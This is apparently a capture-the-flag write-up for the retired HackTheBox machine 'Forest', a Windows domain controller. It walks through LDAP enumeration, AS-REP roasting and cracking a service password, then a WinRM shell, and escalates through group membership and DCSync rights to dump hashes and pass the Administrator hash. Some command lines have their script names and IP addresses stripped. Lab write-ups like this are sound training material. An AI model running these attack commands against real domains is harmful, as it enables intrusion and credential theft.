Name: Forest
Release Date: 22 Oct 2019
Retire Date: 21 Mar 2020
OS: Windows
Base Points: Easy - Retired [0]
Rated Difficulty:
Radar Graph:
cube0x0 00 days, 03 hours, 20 mins, 45 seconds
cube0x0 00 days, 03 hours, 23 mins, 31 seconds
Creator: egre55
CherryTree File: CherryTree - Remove the .txt extension

Again, we start with nmap -sC -sV -oA ./forest

$  nmap -sC -sV -oA ./forest
  Starting Nmap 7.80 ( ) at 2020-04-01 15:40 EDT
  Nmap scan report for
  Host is up (0.095s latency).
  Not shown: 989 closed ports
  53/tcp   open  domain?
  | fingerprint-strings: 
  |   DNSVersionBindReqTCP: 
  |     version
  |_    bind
  88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2020-04-01 19:48:38Z)
  135/tcp  open  msrpc        Microsoft Windows RPC
  139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
  389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
  445/tcp  open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
  464/tcp  open  kpasswd5?
  593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
  636/tcp  open  tcpwrapped
  3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
  3269/tcp open  tcpwrapped
  1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at :
  Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

  Host script results:
  |_clock-skew: mean: 2h27m08s, deviation: 4h02m32s, median: 7m06s
  | smb-os-discovery: 
  |   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
  |   Computer name: FOREST
  |   NetBIOS computer name: FOREST\x00
  |   Domain name: htb.local                                                                                                                                 
  |   Forest name: htb.local                                                                                                                                 
  |   FQDN: FOREST.htb.local                                                                                                                                 
  |_  System time: 2020-04-01T12:51:00-07:00                                                                                                                 
  | smb-security-mode:                                                                                                                                       
  |   account_used: guest                                                                                                                                    
  |   authentication_level: user                                                                                                                             
  |   challenge_response: supported                                                                                                                          
  |_  message_signing: required                                                                                                                              
  | smb2-security-mode: 
  |   2.02: 
  |_    Message signing enabled and required
  | smb2-time: 
  |   date: 2020-04-01T19:50:57
  |_  start_date: 2020-03-31T20:11:05

  Service detection performed. Please report any incorrect results at .
  Nmap done: 1 IP address (1 host up) scanned in 308.31 seconds

Here we have a Windows Server 2016 running with DNS, SMB, LDAP, and a few other nicities but amazingly no web ports.  Combine LDAP with the name of the box "Forest" and we can be fairly certain that this is a Domain Controller and that we are attacking LDAP.  So, first off, let's check the ldap service to see if anonymous binding is enabled.  We do this with


ldapsearch -h -p 389 -x -b "dc=htb,dc=local"


In ldapsearch the -h is the host, -p is the port, -x is for connecting anonymously, and -b is the base distiguished name which we can pull from the SMB response in the nmap output. The output is too large to add here, but is in the above CTB file.  In line 7,826 (not joking) of the ldapsearch output, we find svc-alfreso.  Alfresco is a Content and Process service. One of their support douments here, tells us that Kerberos pre-authentication must be off in order for Alfresco to work with AD.  Excellent!  That means we can request a Kerberos ticket as svc-alfresco.  Somebody didn't think that one through.  If we do a Google search for Kerberoast with Alfresco, our top result is Roasting AS-REPs.  Using from impacket, we can grab the hash.

$  python3 /impacket/examples/ htb.local/svc-alfresco -no-pass -dc-ip
  Impacket v0.9.21.dev1+20200211.101047.70c38fbe - Copyright 2020 SecureAuth Corporation

  [*] Getting TGT for svc-alfresco

Let's use hackcat to break it.

$  hashcat -m 18200 --force -a 0 hash.txt /usr/share/wordlists/rockyou.txt 

  *Dictionary cache hit:
  * Filename..: /usr/share/wordlists/rockyou.txt
  * Passwords.: 14344385
  * Bytes.....: 139921507
  * Keyspace..: 14344385

  Session..........: hashcat
  Status...........: Cracked
  Hash.Type........: Kerberos 5 AS-REP etype 23
  Hash.Target......: $krb5asrep$23$svc-alfresco@HTB.LOCAL:a040aefd7bff80...01f76d
  Time.Started.....: Wed Apr  1 16:28:48 2020 (5 secs)
  Time.Estimated...: Wed Apr  1 16:28:53 2020 (0 secs)
  Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
  Guess.Queue......: 1/1 (100.00%)
  Speed.#1.........:   826.1 kH/s (11.65ms) @ Accel:64 Loops:1 Thr:64 Vec:8
  Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
  Progress.........: 4096000/14344385 (28.55%)
  Rejected.........: 0/4096000 (0.00%)
  Restore.Point....: 4079616/14344385 (28.44%)
  Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
  Candidates.#1....: s9039554h -> s/nd/0s

  Started: Wed Apr  1 16:28:38 2020
  Stopped: Wed Apr  1 16:28:55 2020

So, the password is s3rvice.  That's just laziness right there.  Windows box so SSH is out.  Let's expand our port scan and see if any other Remote Access Tools (RATs) are available.

Interestingly enough, we do find another port open.  We find 47001 open with WinRM running on it.

$    nmap -p-                                                                                                                                                                                            
  Starting Nmap 7.80 ( ) at 2020-04-01 20:28 EDT                                                                                                                                                                           
  Nmap scan report for                                                                                                                                                                                                         
  Host is up (0.13s latency).
  Not shown: 65511 closed ports
  53/tcp    open  domain
  88/tcp    open  kerberos-sec
  135/tcp   open  msrpc
  139/tcp   open  netbios-ssn
  389/tcp   open  ldap
  445/tcp   open  microsoft-ds
  464/tcp   open  kpasswd5
  593/tcp   open  http-rpc-epmap
  636/tcp   open  ldapssl
  3268/tcp  open  globalcatLDAP
  3269/tcp  open  globalcatLDAPssl
  5985/tcp  open  wsman
  9389/tcp  open  adws
  47001/tcp open  winrm
  49664/tcp open  unknown
  49665/tcp open  unknown
  49666/tcp open  unknown
  49667/tcp open  unknown
  49671/tcp open  unknown
  49676/tcp open  unknown
  49677/tcp open  unknown
  49684/tcp open  unknown
  49706/tcp open  unknown
  49910/tcp open  unknown

  Nmap done: 1 IP address (1 host up) scanned in 720.02 seconds

To exploit WinRM, let's use Evil-WinRM, which can be found on the HackPlayers github here.


So, with ruby evil-winrm.rb -i -u svc-alfresco -p s3rvice, we get a low level shell.  Let's now map out the domain and see what privileges everyone has. First, let's get Bloodhound onto the target.  You can get Bloodhound here (or just use pip install bloodhound or apt-get install bloodhound  I went the apt-get direction) and I highly recommend it. For AD mapping it's a powerful tool.  To get it to the target, set up a SimpleHTTPServer and use:


Attacker Machine:
  python3 http.server 8081
  Victim Machine:
  (new-object System.Net.WebClient).DownloadFile('http://YOURIP:PORT/SharpHound.exe', 'C:\Users\svc-alfresco\Desktop\SharpHound.exe')


It will create 2 new files.  You need to get those files back to your machine.  Easily done with a little certutil magic.

Next, we can use the from impacket to move the files over.  Create an smb folder, and then run:

  Attacking Machine:
    sudo python3 /impacket/examples/ share smb
  Victim Machine:
    Copy-Item -Path ./ -Destination \\10.10.XX.XX\share\;
    Copy-Item -Path ./MzZhZTZmYjktOTM4NS00NDQ3LTk3OGItMmEyYTVjZjNiYTYw.bin -Destination \\10.10.XX.XX\share\MzZhZTZmYjktOTM4NS00NDQ3LTk3OGItMmEyYTVjZjNiYTYw.bin;

The files are now on your machine.  Time to fire up BloodHound.  To start, use:

  sudo neo4j console


If this is your first time using BloodHound, or you are using it for the first time on a fresh install, you first need to go to http://localhost:7474 and change the neo4j:neo4j default credential.  When you run bloodhound, you'll need to use those new creds.  Set your starting "node" as svc-alfresco@htb.local.  When BloodHound shows you the user, right click on it and select owned.  Click on the 3 stacked horizontal lines (the hamburger :D) and select the Queries tab.  From there, select "Shortest Path from Owned Principles"

The graph shows that svc-alfresco has permissions to:

1) Create an account (Account Operators)
2) Add users to Exchange Windows Permissions (Because Account Operators has Generic All permissions on Exchange Windows Permissions)
3) Exchange Windows Permissions has WriteDACL to the Domain.

I'm going to rapid fire the next few commands.  We are going to create a new user, add that user to the Exchange Windows Permissions group, and then use the new user and PowerSploit
to dump all of the password hashes.  Here goes:


  net user uvbeenhacked password /add /domain
  net group "Exchange Windows Permissions" /add uvbeenhacked
  Switch to Attacking Machine and the Directory PowerView is in (PowerSploit/Recon/PowerView.ps1)
  python -m SimpleHTTPServer 8081
  Switch BACK to the Victim
  (new-object System.Net.WebClient).DownloadFile('http://10.10.XX.XX:8081/PowerView.ps1', 'C:\Users\svc-alfresco\Desktop\PowerView.ps1')
  $pass = convertto-securestring 'password' -AsPlainText -Force
  $cred = New-Object System.Management.Automation.PSCredential('htb\uvbeenhacked', $pass)
  Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity uvbeenhacked -Rights DCSync
 Switch back to the Attacking Machine
 sudo python3 /impacket/examples/ htb.local\uvbeenhacked:password@

From here, we can pass the hash to get an Administrator shell using:

  /impacket/examples/ -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6 administrator@